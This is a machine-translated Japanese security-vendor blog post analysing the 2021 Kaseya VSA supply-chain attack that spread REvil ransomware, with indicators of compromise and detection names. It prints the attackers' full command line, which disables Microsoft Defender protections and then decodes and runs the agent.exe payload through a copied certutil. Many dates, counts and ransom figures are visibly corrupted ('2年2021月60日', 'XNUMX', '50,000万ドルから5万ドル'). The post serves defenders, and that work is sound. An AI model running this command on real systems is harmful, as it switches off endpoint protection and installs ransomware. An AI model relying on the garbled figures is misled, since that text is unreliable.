• 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
Seqrite ラボ Blog
営業担当者へ連絡 攻撃を受けているのか?
  • 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
ホーム  /  ランサムウェア  / REvil が再び登場:Kaseya VSA ランサムウェア攻撃の詳細
REvilが再び登場:Kaseya VSAランサムウェア攻撃の詳細
15 7月 2021

REvilが再び登場:Kaseya VSAランサムウェア攻撃の詳細

著者 アラヴィンド・ラージ
アラヴィンド・ラージ
ランサムウェア

最近の事例として、米国を拠点とするMSPおよびITチーム向けソフトウェアプロバイダーであるKaseyaは、2年2021月60日に世界的なサプライチェーン攻撃が発生したことを報告しました。これは、攻撃を監視する人員が不足していた米国独立記念日を好機と捉えたものでした。ハッカーグループはKaseya VSAソフトウェアのゼロデイ脆弱性を悪用し、REvilランサムウェアを顧客に配布しました。REvilグループが利用した攻撃は、サプライチェーン技術を利用している約XNUMX社のMSPとその法人顧客に影響を与えた可能性があります。攻撃者は、復号処理のために高額の身代金を要求し、身代金を支払わない場合は情報を漏洩すると脅迫しています。

REvil/Sodinokibi とは何ですか?

REvil/Sodinokibi/Sodinは、金銭目的のGOLD SOUTHFIELDグループに関連するGrandCrabランサムウェアのリブランド版です。このグループは、被害者のデータを暗号化前に盗み出し、身代金が支払われない場合はデータを公開すると脅迫することで知られています。

彼らは2019年40月から活動を開始し、世界全体のランサムウェア感染の約XNUMX%を占めています。当初はアジアとヨーロッパ地域を標的としていましたが、現在では世界中に活動範囲を広げています。

ランサムウェアが初めて出現した際は、中小企業のサーバーやその他の重要資産の脆弱性や、ソフトウェアインストーラーをエクスプロイトキットとして悪用していました。しかし現在では、サプライチェーン攻撃へと移行し始めています。既に公開しています。 blog REvilによく似たGrandCrabについて ransomware攻撃.

攻撃者はどのように侵入したのでしょうか?

ハッカーたちはMSPプロバイダーに攻撃を仕掛け、ゼロデイ脆弱性を悪用した[CVE-2021-30116オンプレミスのVSAサーバーに侵入すると、接続されたクライアントはVSAサーバーが要求するあらゆるタスクを何の疑問もなく実行します。攻撃者は、被害者のネットワークにアクセスした時点で、VSAへの管理者アクセスを無効化します。

攻撃者はユーザー「agent curl/7.69.1」を使用して以下の IP アドレスを使用して攻撃を開始したことが判明しました。

  • 18[。]223.199.234
  • 161[。]35.239.148
  • 35[。]226.94.113
  • 162[。]253.124.162

SolarWindsのサプライチェーン攻撃とは異なり、Kaseyaのサーバーには侵害の兆候が見られません。Kaseyaの顧客の多くはMSPです。ハッカーはオンプレミス版のソフトウェアを悪用し、ランサムウェア攻撃を容易に下流に伝播させることができました。

グループの要求額は、システムがドメインに接続されているかどうかに応じて、50,000万ドルから5万ドルまでと幅があります。また、彼らはダークウェブサイトに掲載されている汎用復号ツールに対して70万ドルを要求しています。

 

Kaseya VSAゼロデイ攻撃の技術的詳細

  1. 初期段階は、マネージド サービス プロバイダー (MSP) からの悪意のあるプロセスがユーザーに到達したときに始まります。
  2. VSA プロセスは、「Kaseya VSA Agent Hotfix」という暗号化を導入しました。これは管理者アクセスでシステム内で実行され、更新処理のセキュリティ対策を回避します。
  3. 実行されるスクリプトは以下のとおりです。これにより、Microsoft Defender サービス、DisableRealtimeMonitoring、DisableIntrusionPreventionSystem、DisableIOAVProtectio、および DisableScriptScanning が無効になります。
    “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

     

  4. このアップデートが処理されると、悪意のある実行ファイルローダー「agent.exe」を含むREvilペイロードが配信されます。
  5. Agent.exeには「PE03 TRANSPORT LTD」によって署名された有効なデジタル署名があり、攻撃のXNUMX日前に署名されました。

    MsMpEng.exe を使用してサイドロードされた Mpsvc.dll を呼び出す
  6. 「MsMpEng.exe」を使用して、「Mpscv.dll」がサイドロードされ、ランサムウェアが実行されます。
  7. 全体的なプロセスチェーンは以下のように表される。

    全体的なプロセス

REvil ランサムウェアの実行について。

  • プロセスはメモリ内で自身を復号化し、JSON形式で保存された構成ファイルと、以下に示すような構成パラメータを抽出することによって開始されます。 こちら.
  • 他のバージョンとは異なり、このバージョンはWindowsの「シャドウコピー」を削除しません。これは、多くのランサムウェアが通常行うものです。多くのアンチウイルスソフトでは、ランサムウェアの検出メカニズムとしてシャドウコピーが使用されているため、この操作を実行するとプロセスが停止する可能性があります。
  • AES 暗号化は、ユーザーのマシン上でローカルに生成される秘密鍵と公開鍵のペアの秘密鍵を暗号化するために使用されます。
  • 一方、Salsa20 はユーザー ファイルの暗号化に使用されます。

    レジストリに設定を保存します
  • また、生成されたキーが保存されるレジストリキー「HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter」も作成されます。このキーには、設定内の公開キーで暗号化された秘密キーが含まれています。公開キーと秘密キーはバイナリで暗号化されます。情報を含む暗号化された文字列はC2サーバーに送信され、暗号化されたファイルにランダムなファイル拡張子が付加されます。
  • 以下のコマンドを使用すると、Windows ファイアウォール設定が追加され、ローカル システムがローカル ネットワーク上で他のコンピューターによって検出されるようになります。
netsh advfirewall ファイアウォール ルール グループを「ネットワーク探索」に設定し、有効にするには「はい」と入力します。
  • 暗号化は複数のスレッドで開始され、ネットワーク ドライブを含む拡張機能で提供されるファイルを暗号化します。
  • REvilは、「楕円曲線Diffie-Hellman」鍵生成・交換アルゴリズムを用いて秘密鍵と公開鍵のペアを生成します。共有秘密鍵は、対称暗号化アルゴリズムAESおよびSalsa20の鍵として使用するために開発されています。
  • 完了すると、ファイルの復元手順が記載された身代金要求メモファイルが各フォルダにドロップされます。

    身代金注記
  • 汎用的な復号ツールはまだ利用できないため、身代金を支払った場合にのみ復号を行うことができます。

    ダークウェブの復号ページ

結論

Kaseyaは11月XNUMX日にパッチをリリースし、VSA SaaSインフラストラクチャもオンラインに戻しました。パッチは以下からダウンロードできます。 こちらまた、VSA サーバーでの潜在的なエクスプロイトリスク検出とエンドポイントスキャン用のツールもリリースされました。 ダウンロード ここに。ランサムウェアは業務を混乱させる最も深刻な問題です。ランサムウェアの主な動機は、攻撃者が得る金銭的利益です。標的型攻撃を止めることはできませんが、予防することはできます。

Seqrite ランサムウェア攻撃のリスクが高まっていることに組織が警戒し、インシデント対応計画と問題発生時に対応できるチームを準備しておくよう勧告している。

こうしたタイプの攻撃を予防/制限するための積極的な方法は、

  • 対応および修復計画にサプライ チェーンを含めます。
  • 脅威の状況をマップします。
  • サプライ チェーン ベンダーがセキュリティ ポリシーと手順を構造化し、検証し、認定していることを確認します。
  • 被害を軽減するために、貴重なデータの最新のバックアップを維持してください。

認定条件 Seqrite ユーザーを保護しますか?

Quick Healは、今回の一連の攻撃におけるランサムウェアのペイロードをブロックするためのプロアクティブなツールを提供します。Quick Healは、以下の検出名でサンプルを検出します。

  • Trojanransom.Gen
  • Trojanransom.Sodin
  • ランサム・レビル
  • Trojanransom.Encoder
  • トロイの木馬エージェント

侵入の痕跡(IoC)

ローダー

  • 0299e3c2536543885860c7b61e1efc3f
  • 5a97a50e45e64db41049fd88a75f2dd2
  • be6c46239e9c753de227bf1f3428e271
  • 835f242dde220cc76ee5544119562268
  • 18786bfac1be0ddf23ff94c029ca4d63
  • 8535397007ecb56d666b666c3592c26d
  • 561cffbaba71a6e8cc1cdceda990ead4

DLL

  • 78066A1C4E075941272A86D4A8E49471
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • 849fb558745e4089a8232312594b21d2
  • 4a91cb0705539e1d09108c60f991ffcf
  • 7d1807850275485397ce2bb218eff159
  • a560890b8af60b9824c73be74ef24a46
  • a47cf00aedf769d60d58bfe00c0b5421

REvil 設定ファイル

詳細

参考情報

Kaseya VSAサプライチェーンランサムウェア攻撃に関する勧告

 

 

 

 以前の投稿Seqrite インドを標的としたオペレーション・サイドコピーの第2波を暴露...
次の投稿  クラウドに移行しますか? クラウド上でサイバーリスクを管理する方法を学びましょう...
アラヴィンド・ラージ

アラヴィンド・ラージについて

Aravind Rajは、Quick Heal Security Labのセキュリティ研究者です。マルウェア分析、リバースエンジニアリング、タスク自動化に興味を持ち、…

アラヴィンド・ラージによる記事 »

関連記事

  • ランサムウェア攻撃による被害を最小限に抑えるための最適なインシデント対応手法

    2026 年 6 月 2 日
  • 身代金を支払わずにランサムウェア攻撃から復旧する方法

    2026 年 5 月 25 日
  • 公開共有SMB2接続に対するランサムウェア攻撃と保護対策 Seqrite

    2025 年 3 月 11 日
注目の著者
  • Seqrite
    Seqrite

    Seqrite は、大手企業向けサイバーセキュリティソリューションプロバイダーです。重点分野は…

    より多くの記事を読んで Seqrite
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    Jyoti Karlekar の記事をもっと読む
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    Bineesh P によるその他の記事を読む
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    サンジャイ・カトカーによるその他の記事を読む
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (341) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (51) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) data privacy (16) データ保護 (34) データセキュリティ (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) エンドポイントセキュリティ (113) エンタープライズセキュリティ (19) 悪用する (13) GDPR (14) マルウェア (76) マルウェア分析 (14) マルウェア攻撃 (23) MDM (27) Microsoft (15) MITER ATT&CK (14) ネットワークセキュリティ (26) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (31) ransomware攻撃 (31) ransomwareの保護 (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) 脅威の検出 (14) Threat Intelライセンス (20) UTM (34) 脆弱性 (16) ゼロトラスト (13)
Seqrite ラボ

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

続きを読む Seqrite

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • オンプレミス
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • マイクロビジネス
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • サイバーセキュリティと Data Privacy Awareness
資料
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • 理解する Data Privacy
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
  • プライバシーアワー
お問い合わせ
  • 登記事務所
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • 学校区概要 Seqrite
  • リーダーシップ
  • 受賞
  • ニュースルーム
パートナー
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite 認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約